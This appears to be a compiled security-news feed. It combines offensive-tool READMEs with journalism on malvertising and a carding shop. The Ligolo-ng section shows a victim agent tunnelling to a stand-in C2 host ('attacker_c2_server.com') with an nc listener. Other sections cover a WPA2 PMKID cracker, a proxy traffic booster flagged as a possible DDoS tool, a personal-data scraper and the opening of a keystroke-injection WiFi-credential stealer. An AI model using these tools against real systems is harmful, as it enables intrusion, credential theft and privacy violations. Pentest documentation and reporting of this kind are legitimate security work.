    docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

    Another way to setup the environment is by running our provided docker compose file:

    git clone https://github.com/CycodeLabs/raven.git
    cd raven
    make setup

    Step 3: Run Raven Downloader

    Org mode:

    raven download org --token $GITHUB_TOKEN --org-name RavenDemo

    Crawl mode:

    raven download crawl --token $GITHUB_TOKEN --min-stars 1000

    Step 4: Run Raven Indexer

    raven index

    Step 5: Inspect the results through the reporter

    raven report --format raw

    At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

    Prerequisites

    • Python 3.9+
    • Docker Compose v2.1.0+
    • Docker Engine v1.13.0+

    Infrastructure

    Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

    Usage

    The tool contains three main functionalities, download and index and report.

    Download

    Download Organization Repositories

    usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --org-name ORG_NAME Organization name to download the workflows

    Download Public Repositories

    usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --max-stars MAX_STARS
    Maximum number of stars for a repository
    --min-stars MIN_STARS
    Minimum number of stars for a repository, default : 1000

    Index

    usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
    [--clean-neo4j] [--debug]

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
    --debug Whether to print debug statements, default: False

    Report

    usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
    [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
    [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
    [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
    {slack} ...

    positional arguments:
    {slack}
    slack Send report to slack channel

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
    Filter queries with specific tag
    --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
    Filter queries by severity level (default: info)
    --queries-path QUERIES_PATH, -dp QUERIES_PATH
    Queries folder (default: library)
    --format {raw,json}, -f {raw,json}
    Report format (default: raw)

    Examples

    Retrieve all workflows and actions associated with the organization.

    raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

    Scrape all publicly accessible GitHub repositories.

    raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

    After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

    raven index --debug

    Now, we can generate a report using our query library.

    raven report --severity high --tag injection --tag unauthenticated

    Rate Limiting

    For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

    • Code search - 30 queries per minute
    • Any other API - 5000 per hour

    Research Knowledge Base

    Current Limitations

    • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
    • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
    • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
    • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

    Future Research Work

    • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
    • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
    • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

    Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

    If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

    If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



    Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

    By: Zion3R


    Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


    Features

    • Tun interface (No more SOCKS!)
    • Simple UI with agent selection and network information
    • Easy to use and setup
    • Automatic certificate configuration with Let's Encrypt
    • Performant (Multiplexing)
    • Does not require high privileges
    • Socket listening/binding on the agent
    • Multiple platforms supported for the agent

    How is this different from Ligolo/Chisel/Meterpreter... ?

    Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

    When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

    As an example, for a TCP connection:

    • SYN are translated to connect() on remote
    • SYN-ACK is sent back if connect() succeed
    • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
    • Nothing is sent if timeout

    This allows running tools like nmap without the use of proxychains (simpler and faster).

    Building & Usage

    Precompiled binaries

    Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

    Building Ligolo-ng

    Building ligolo-ng (Go >= 1.20 is required):

    $ go build -o agent cmd/agent/main.go
    $ go build -o proxy cmd/proxy/main.go
    # Build for Windows
    $ GOOS=windows go build -o agent.exe cmd/agent/main.go
    $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

    Setup Ligolo-ng

    Linux

    When using Linux, you need to create a tun interface on the Proxy Server (C2):

    $ sudo ip tuntap add user [your_username] mode tun ligolo
    $ sudo ip link set ligolo up

    Windows

    You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

    Running Ligolo-ng proxy server

    Start the proxy server on your Command and Control (C2) server (default port 11601):

    $ ./proxy -h # Help options
    $ ./proxy -autocert # Automatically request LetsEncrypt certificates

    TLS Options

    Using Let's Encrypt Autocert

    When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

    Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

    Using your own TLS certificates

    If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

    Automatic self-signed certificates (NOT RECOMMENDED)

    The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

    The -ignore-cert option needs to be used with the agent.

    Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

    Using Ligolo-ng

    Start the agent on your target (victim) computer (no privileges are required!):

    $ ./agent -connect attacker_c2_server.com:11601

    If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

    A session should appear on the proxy server.

    INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

    Use the session command to select the agent.

    ligolo-ng » session 
    ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

    Display the network configuration of the agent using the ifconfig command:

    [Agent : nchatelain@nworkstation] » ifconfig 
    [...]
    ┌─────────────────────────────────────────────┐
    │ Interface 3 │
    ├──────────────┬──────────────────────────────┤
    │ Name │ wlp3s0 │
    │ Hardware MAC │ de:ad:be:ef:ca:fe │
    │ MTU │ 1500 │
    │ Flags │ up|broadcast|multicast │
    │ IPv4 Address │ 192.168.0.30/24 │
    └──────────────┴──────────────────────────────┘

    Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

    Linux:

    $ sudo ip route add 192.168.0.0/24 dev ligolo

    Windows:

    > netsh int ipv4 show interfaces

    Idx Mét MTU État Nom
    --- ---------- ---------- ------------ ---------------------------
    25 5 65535 connected ligolo

    > route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

    Start the tunnel on the proxy:

    [Agent : nchatelain@nworkstation] » start
    [Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation

    You can now access the 192.168.0.0/24 agent network from the proxy server.

    $ nmap 192.168.0.0/24 -v -sV -n
    [...]
    $ rdesktop 192.168.0.123
    [...]

    Agent Binding/Listening

    You can listen to ports on the agent and redirect connections to your control/proxy server.

    In a ligolo session, use the listener_add command.

    The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

    [Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
    INFO[1208] Listener created on remote agent!

    On the proxy:

    $ nc -lvp 4321

    When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

    This is very useful when using reverse tcp/udp payloads.

    You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

    [Agent : nchatelain@nworkstation] » listener_list 
    ┌───────────────────────────────────────────────────────────────────────────────┐
    │ Active listeners │
    ├───┬─────────────────────────┬───── ───────────────────┬────────────────────────┤
    │ # │ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
    ├───┼─────────────────────────┼────────────────────────┼────────────────────────& #9508;
    │ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234 │ 127.0.0.1:4321 │
    └───┴─────────────────────────┴────────────────────────┴────────────────────────┘

    [Agent : nchatelain@nworkstation] » listener_stop 0
    INFO[1505] Listener closed.

    Demo

    ligolo-ng_demo.mp4

    Does it require Administrator/root access ?

    On the agent side, no! Everything can be performed without administrative access.

    However, on your relay/proxy server, you need to be able to create a tun interface.

    Supported protocols/packets

    • TCP
    • UDP
    • ICMP (echo requests)

    Performance

    You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

    $ iperf3 -c 10.10.0.1 -p 24483
    Connecting to host 10.10.0.1, port 24483
    [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
    [ ID] Interval Transfer Bitrate Retr Cwnd
    [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
    [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
    [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
    [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
    [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
    [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
    [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
    [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
    [ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
    [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
    - - - - - - - - - - - - - - - - - - - - - - - - -
    [ ID] Interval Transfer Bitrate Retr
    [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
    [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

    Caveats

    Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

    When using nmap, you should use --unprivileged or -PE to avoid false positives.

    Todo

    • Implement other ICMP error messages (this will speed up UDP scans) ;
    • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
    • Add mTLS support.

    Credits

    • Nicolas Chatelain <nicolas -at- chatelain.me>


    Perfecting the Defense-in-Depth Strategy with Automation

    Medieval castles stood as impregnable fortresses for centuries, thanks to their meticulous design. Fast forward to the digital age, and this medieval wisdom still echoes in cybersecurity. Like castles with strategic layouts to withstand attacks, the Defense-in-Depth strategy is the modern counterpart — a multi-layered approach with strategic redundancy and a blend of passive and active security

    Using Google Search to Find Software Can Be Risky

    Google continues to struggle with cybercriminals running malicious ads on its search platform to trick people into downloading booby-trapped copies of popular free software applications. The malicious ads, which appear above organic search results and often precede links to legitimate sources of the same software, can make searching for software on Google a dicey affair.

    Google says keeping users safe is a top priority, and that the company has a team of thousands working around the clock to create and enforce their abuse policies. And by most accounts, the threat from bad ads leading to backdoored software has subsided significantly compared to a year ago.

    But cybercrooks are constantly figuring out ingenious ways to fly beneath Google’s anti-abuse radar, and new examples of bad ads leading to malware are still too common.

    For example, a Google search earlier this week for the free graphic design program FreeCAD produced the following result, which shows that a “Sponsored” ad at the top of the search results is advertising the software available from freecad-us[.]org. Although this website claims to be the official FreeCAD website, that honor belongs to the result directly below — the legitimate freecad.org.

    How do we know freecad-us[.]org is malicious? A review at DomainTools.com show this domain is the newest (registered Jan. 19, 2024) of more than 200 domains at the Internet address 93.190.143[.]252 that are confusingly similar to popular software titles, including dashlane-project[.]com, filezillasoft[.]com, keepermanager[.]com, and libreofficeproject[.]com.

    Some of the domains at this Netherlands host appear to be little more than software review websites that steal content from established information sources in the IT world, including Gartner, PCWorld, Slashdot and TechRadar.

    Other domains at 93.190.143[.]252 do serve actual software downloads, but none of them are likely to be malicious if one visits the sites through direct navigation. If one visits openai-project[.]org and downloads a copy of the popular Windows desktop management application Rainmeter, for example, the file that is downloaded has the same exact file signature as the real Rainmeter installer available from rainmeter.net.

    But this is only a ruse, says Tom Hegel, principal threat researcher at the security firm Sentinel One. Hegel has been tracking these malicious domains for more than a year, and he said the seemingly benign software download sites will periodically turn evil, swapping out legitimate copies of popular software titles with backdoored versions that will allow cybercriminals to remotely commander the systems.

    “They’re using automation to pull in fake content, and they’re rotating in and out of hosting malware,” Hegel said, noting that the malicious downloads may only be offered to visitors who come from specific geographic locations, like the United States. “In the malicious ad campaigns we’ve seen tied to this group, they would wait until the domains gain legitimacy on the search engines, and then flip the page for a day or so and then flip back.”

    In February 2023, Hegel co-authored a report on this same network, which Sentinel One has dubbed MalVirt (a play on “malvertising”). They concluded that the surge in malicious ads spoofing various software products was directly responsible for a surge in malware infections from infostealer trojans like IcedID, Redline Stealer, Formbook and AuroraStealer.

    Hegel noted that the spike in malicious software-themed ads came not long after Microsoft started blocking by default Office macros in documents downloaded from the Internet. He said the volume of the current malicious ad campaigns from this group appears to be relatively low compared to a year ago.

    “It appears to be same campaign continuing,” Hegel said. “Last January, every Google search for ‘Autocad’ led to something bad. Now, it’s like they’re paying Google to get one out of every dozen of searches. My guess it’s still continuing because of the up-and-down [of the] domains hosting malware and then looking legitimate.”

    Several of the websites at this Netherlands host (93.190.143[.]252) are currently blocked by Google’s Safebrowsing technology, and labeled with a conspicuous red warning saying the website will try to foist malware on visitors who ignore the warning and continue.

    But it remains a mystery why Google has not similarly blocked more than 240+ other domains at this same host, or else removed them from its search index entirely. Especially considering there is nothing else but these domains hosted at that Netherlands IP address, and because they have all remained at that address for the past year.

    In response to questions from KrebsOnSecurity, Google said maintaining a safe ads ecosystem and keeping malware off of its platforms is a priority across Google.

    “Bad actors often employ sophisticated measures to conceal their identities and evade our policies and enforcement, sometimes showing Google one thing and users something else,” Google said in a written statement. “We’ve reviewed the ads in question, removed those that violated our policies, and suspended the associated accounts. We’ll continue to monitor and apply our protections.”

    Google says it removed 5.2 billion ads in 2022, and restricted more than 4.3 billion ads and suspended over 6.7 million advertiser accounts. The company’s latest ad safety report says Google in 2022 blocked or removed 1.36 billion advertisements for violating its abuse policies.

    Some of the domains referenced in this story were included in Sentinel One’s February 2023 report, but dozens more have been added since, such as those spoofing the official download sites for Corel Draw, Github Desktop, Roboform and Teamviewer.

    This October 2023 report on the FreeCAD user forum came from a user who reported downloading a copy of the software from freecadsoft[.]com after seeing the site promoted at the top of a Google search result for “freecad.” Almost a month later, another FreeCAD user reported getting stung by the same scam.

    “This got me,” FreeCAD forum user “Matterform” wrote on Nov. 19, 2023. “Please leave a report with Google so it can flag it. They paid Google for sponsored posts.”

    Sentinel One’s report didn’t delve into the “who” behind this ongoing MalVirt campaign, and there are precious few clues that point to attribution. All of the domains in question were registered through webnic.cc, and several of them display a placeholder page saying the site is ready for content. Viewing the HTML source of these placeholder pages shows many of the hidden comments in the code are in Cyrillic.

    Trying to track the crooks using Google’s Ad Transparency tools didn’t lead far. The ad transparency record for the malicious ad featuring freecad-us[.]org (in the screenshot above) shows that the advertising account used to pay for the ad has only run one previous ad through Google search: It advertised a wedding photography website in New Zealand.

    The apparent owner of that photography website did not respond to requests for comment, but it’s also likely his Google advertising account was hacked and used to run these malicious ads.

    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R


    Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

    Whats New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-webscrapping techniques.
    • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
    • Implemented Multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    E-Crime Rapper ‘Punchmade Dev’ Debuts Card Shop

    The rapper and social media personality Punchmade Dev is perhaps best known for his flashy videos singing the praises of a cybercrime lifestyle. With memorable hits such as “Internet Swiping” and “Million Dollar Criminal” earning millions of views, Punchmade has leveraged his considerable following to peddle tutorials on how to commit financial crimes online. But until recently, there wasn’t much to support a conclusion that Punchmade was actually doing the cybercrime things he promotes in his songs.

    Images from Punchmade Dev’s Twitter/X account show him displaying bags of cash and wearing a functional diamond-crusted payment card skimmer.

    Punchmade Dev’s most controversial mix — a rap called “Wire Fraud Tutorial” — was taken down by Youtube last summer for violating the site’s rules. Punchmade shared on social media that the video’s removal was prompted by YouTube receiving a legal process request from law enforcement officials.

    The 24-year-old rapper told reporters he wasn’t instructing people how to conduct wire fraud, but instead informing his fans on how to avoid being victims of wire fraud. However, this is difficult to discern from listening to the song, which sounds very much like a step-by-step tutorial on how to commit wire fraud.

    “Listen up, I’m finna show y’all how to hit a bank,” Wire Fraud Tutorial begins. “Just pay attention, this is a quick way to jug in any state. First you wanna get a bank log from a trusted site. Do your research because the information must be right.”

    And even though we’re talking about an individual who regularly appears in videos wearing a half-million dollars worth of custom jewelry draped around his arm and neck (including the functional diamond-encrusted payment card skimming device pictured above), there’s never been much evidence that Punchmade was actually involved in committing cybercrimes himself. Even his most vocal critics acknowledged that the whole persona could just be savvy marketing.

    That changed recently when Punchmade’s various video and social media accounts began promoting a new web shop that is selling stolen payment cards and identity data, as well as hacked financial accounts and software for producing counterfeit checks.

    Punchmade Dev's shop.

    Punchmade Dev’s shop.

    The official Punchmadedev account on Instagram links to many of the aforementioned rap videos and tutorials on cybercriming, as well as to Punchmadedev’s other profiles and websites. Among them is mainpage[.]me/punchmade, which includes the following information for “Punchmade Empire ®

    -212,961 subscribers

    #1 source on Telegram

    Contact: @whopunchmade

    24/7 shop: https://punchmade[.]atshop[.]io

    Visiting that @whopunchmade Telegram channel shows this user is promoting punchmade[.]atshop[.]io, which is currently selling hacked bank accounts and payment cards with high balances.

    Clicking “purchase” on the C@sh App offering, for example, shows that for $80 the buyer will receive logins to Cash App accounts with balances between $3,000 and $5,000. “If you buy this item you’ll get my full support on discord/telegram if there is a problem!,” the site promises. Purchases can be made in cryptocurrencies, and checking out prompts one to continue payment at Coinbase.com.

    Another item for sale, “Fullz + Linkable CC,” promises “ID Front + Back, SSN with 700+ Credit Score, and Linkable CC” or credit card. That also can be had for $80 in crypto.

    WHO IS PUNCHMADE DEV?

    Punchmade has fashioned his public persona around a collection of custom-made, diamond-covered necklaces that are as outlandish and gaudy as they are revelatory. My favorite shot from one of Punchmade’s videos features at least three of these monstrosities: One appears to be a boring old diamond and gold covered bitcoin, but the other two necklaces tell us something about where Punchmade is from:

    Notice the University of Kentucky logo, and the Lexington, Ky skyline.

    One of them includes the logo and mascot of the University of Kentucky. The other, an enormous diamond studded skyline, appears to have been designed based on the skyline in Lexington, Ky:

    The “About” page on Punchmade Dev’s Spotify profile describes him as “an American artist, rapper, musician, producer, director, entrepreneur, actor and investor.” “Punchmade Dev is best known for his creative ways to use technology, video gaming, and social media to build a fan base,” the profile continues.

    The profile explains that he launched his own record label in 2021 called Punchmade Records, where he produces his own instrumentals and edits his own music videos.

    A search on companies that include the name “punchmade” at the website of the Kentucky Secretary of State brings up just one record: OBN Group LLC, in Lexington, Ky. This November 2021 record includes a Certificate of Assumed Name, which shows that Punchmade LLC is the assumed name of OBN Group LLC.

    The president of OBN Group LLC is listed as Devon Turner. A search on the Secretary of State website for other businesses tied to Devon Turner reveals just one other record: A now-defunct entity called DevTakeFlightBeats Inc.

    The breach tracking service Constella Intelligence finds that Devon Turner from Lexington, Ky. used the email address obndevpayments@gmail.com. A lookup on this email at DomainTools.com shows it was used to register the domain foreverpunchmade[.]com, which is registered to a Devon Turner in Lexington, Ky. A copy of this site at archive.org indicates it once sold Punchmade Dev-branded t-shirts and other merchandise.

    Mr. Turner did not respond to multiple requests for comment.

    Searching online for Devon Turner and “Punchmade” brings up a video from @brainjuiceofficial, a YouTube channel that focuses on social media celebrities. @Brainjuiceofficial says Turner was born in October 2000, the oldest child of a single mother of five whose husband was not in the picture.

    Devon Turner, a.k.a. “Punchmade Dev,” in an undated photo.

    The video says the six-foot five Turner played basketball, track and football in high school, but that he gradually became obsessed with playing the video game NBA 2K17 and building a following of people watching him play the game competitively online.

    According to this brief documentary, Turner previously streamed his NBA 2K17 videos on a YouTube channel called DevTakeFlight, although he originally went by the nickname OBN Dev.

    “Things may eventually catch up to Devon if he isn’t careful,” @Brainjuiceofficial observed, noting that Turner has been shot at before, and also robbed at an ATM while flexing a bunch of cash for a picture and wearing $500k in jewelry. “Although you have a lot of people that are into what you do, there are a lot of people waiting for you to slip up.”

    Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

    By: Zion3R


    This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


    Program Usage

    python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

    NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

    How PMKID is Calculated

    The two main formulas to obtain a PMKID are as follows:

    1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
    2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

    This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

    Obtaining the PMKID

    Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

    *You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

    To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

    Open the pcap in WireShark:

    • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
    • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
    • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

    If access point is vulnerable, you should see the PMKID value like the below screenshot:

    Demo Run

    Disclaimer

    This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



    New Python-based FBot Hacking Toolkit Aims at Cloud and SaaS Platforms

    A new Python-based hacking tool called&nbsp;FBot&nbsp;has been uncovered targeting web servers, cloud services, content management systems (CMS), and SaaS platforms such as Amazon Web Services (AWS), Microsoft 365, PayPal, Sendgrid, and Twilio. “Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various

    PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

    By: Zion3R


    PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

    Features:

    • Utilizes a list of proxy IP addresses from a specified file.
    • Supports both HTTP and HTTPS proxies.
    • Allows users to input the target website URL, proxy file path, and a static port.
    • Makes HTTP requests to the specified website using each proxy.
    • Parses HTML content to extract and visit links on the webpage.

    Usage:

    • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
    • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
    • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
    • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
    • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

    Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
    • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

    How to Use:

    1. Clone the repository:
    git clone https://github.com/spyboy-productions/PhantomCrawler.git
    1. Install dependencies:
    pip3 install -r requirements.txt
    1. Run the script:
    python3 PhantomCrawler.py

    Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


    Snapshots:

    If you find this GitHub repo useful, please consider giving it a star! 



    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R


    Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.

     

    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

    • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
